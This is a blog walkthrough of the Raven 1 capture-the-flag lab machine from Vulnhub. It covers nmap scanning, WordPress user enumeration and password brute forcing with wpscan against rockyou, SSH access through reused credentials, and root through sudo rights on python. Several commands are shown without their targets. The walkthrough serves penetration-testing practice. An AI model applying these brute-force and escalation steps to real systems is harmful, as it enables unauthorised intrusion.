Vulnhub Raven 1 Walkthrough

By R3a50n



Raven 1 is listed as a beginner/intermediate CTF box on Vulnhub. I would classify it more as beginner but it always depends on the attacker’s skill set. I would recommend running it in VMWare because of the trouble I had trying to get it running with VirtualBox.

Quick warning about the commands in this post. The font on this site will make double dashes look like one long dash. If you’re getting syntax errors or other unexpected results, check the commands help reference.

Ok on with the hacky stuff …

Step 1:

Identify the IP Address

netdiscover -r

In my lab it came out as but yours may vary.

Step 2:

Nmap Scan

nmap -sC -sV -v -oN map1

This will do version scanning, apply default scripts, verbose and dump it to a file. Keep in mind this will only scan the most popular 1000 ports unless otherwise specified.


Here we can see 22 (ssh), 80 (http) and 111 (rpc) are open. RPC gives us some information on some other ports but that’s not necessary. Let’s take a look at the web port.

Step 3:

Brows to site


Looks like WordPress but let’s look around a little. In source of the service tab, the first flag becomes visible.


Navigating to the Blog tab confirms it’s WordPress, but it looks broken


Looking at the source we can see it’s trying to locate raven.local.


By adding raven.local to the /etc/hosts file, we can make things resolve properly.


Step 4:

Scan WordPress

Since this is WordPress, let’s run a wpscan and see if we can enumerate some users.

wpscan –url –enumerate u


Going to the login page, I tried to guess the passwords, but nothing worked. I did find out that there are no lockouts. This makes it a perfect candidate for a brute force attempt.


Step 5:

Brute Force

Wpscan will do brute force attempts on enumerated users, however, it will only do one at a time. I wanted to do both users at the same time so I ran two different instances of wpscan each with one of the user names.

wpscan –url -U steven -w /usr/share/wordlists/rockyou.txt — threads 25

After some time, the steven account displayed an error on one of the responses.


Let’s try it anyway … and it works!


Here you can also find flag3 within the posts.


Step 6:


So now we could try to bypass WordPress file upload restrictions to get a shell, but first let’s try something else. Remember the SSH port? The user may have reused his credentials there.

Let’s try it!


Step 7:

Post Exploration – Root – Final Flag

It worked! Now we have a user access on the box. Now if you’re hunting for flags, our missing Flag2 can be found in the /var/www directory.


Ok let’s get root. One of the first things to check is our sudo permissions


This is great! We can run python as root which means we can basically do whatever we want. Let’s get a bash shell. The command I’m using is normally used to upgrade shell’s that don’t have tty support, but it works perfectly fine in this situation as well.


Root Dance!
And now we can go for that final flag …


That was Raven 1. Another path to getting the initial shell would have been to brute force the SSH login. I didn’t do it initially because SSH brute forcing usually takes forever, but it does work. The wpscan brute force took over an hour, though I did have the threads split between two different accounts. With access to the WordPress directory you can get the root MySQL password and search the database. You could potentially crack the other user password using hashcat or john faster than the wpscan brute force. In the end that wasn’t needed.

Final Thoughts:

Raven 1 was more basic than intermediate, but decent for those just starting out. I don’t love brute force as a path on a CTF, but it is a good skill to learn. I thought flag2 was in a strange place and only found it by searching the file system after rooting the box. Putting it in one of the user directories (steven has access to both) would have made more sense. Anyway, it wasn’t a bad way to spend a few hours. I’ll have to try Raven 2 soon.

I also made a video with some extra content at the end. It shows SSH brute forcing with hydra and WordPress brute force with BurpSuite. You can find it here.

Happy Hacking


Leave a Reply

Fill in your details below or click an icon to log in: Logo

You are commenting using your account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s